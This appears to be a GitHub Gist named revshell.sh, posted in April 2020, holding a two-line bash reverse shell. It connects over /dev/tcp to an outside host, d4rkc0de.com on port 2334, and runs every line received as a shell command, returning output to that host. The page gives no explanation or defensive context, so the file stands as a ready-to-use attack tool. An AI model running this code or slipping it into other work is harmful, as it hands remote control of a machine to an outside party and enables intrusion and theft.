Created
April 1, 2020 12:29
-
-
Save lionaneesh/58d88fb38e530811f030f5c6a80a2bad to your computer and use it in GitHub Desktop.
revshell.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
exec 5<>/dev/tcp/d4rkc0de.com/2334 | |
cat <&5 | while read line; do $line 2>&5 >&5; done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment